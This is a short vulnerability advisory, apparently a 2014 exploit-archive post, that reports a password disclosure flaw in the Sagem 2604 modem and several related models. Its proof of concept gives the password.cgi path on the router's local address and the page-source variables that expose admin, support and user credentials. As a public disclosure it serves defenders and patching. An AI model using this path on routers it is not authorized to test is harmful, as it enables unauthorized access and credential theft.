Sagem 2604 Password Disclosure Vulnerability

[+]Title: Sagem 2604 Password Discolusre vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 6/JUN/2014
[+]Type:WebApp
[+]Risk:High
[+]Affected Version: v2604
                     Hardware Version:  253251193
                     Software Version:  3.21a4G


[+]Overview:
Sagem modem suffers, from a password discolsure vulnerability.

[+]Proof Of Concept:
myrouter/(or)192.168.1.1/password.cgi
View Source
pwdAdmin = 'password';
pwdSupport = 'password';
pwdUser = 'password';

nmAdmin = 'username';
nmSupport = 'username';
nmUser = 'username';

http://i.imgur.com/2g55TRn.png

Other modems which suffers from this vuln.:
Comtrend CT 53XX
Sagem 2404

#  0day.today [2018-03-28]  #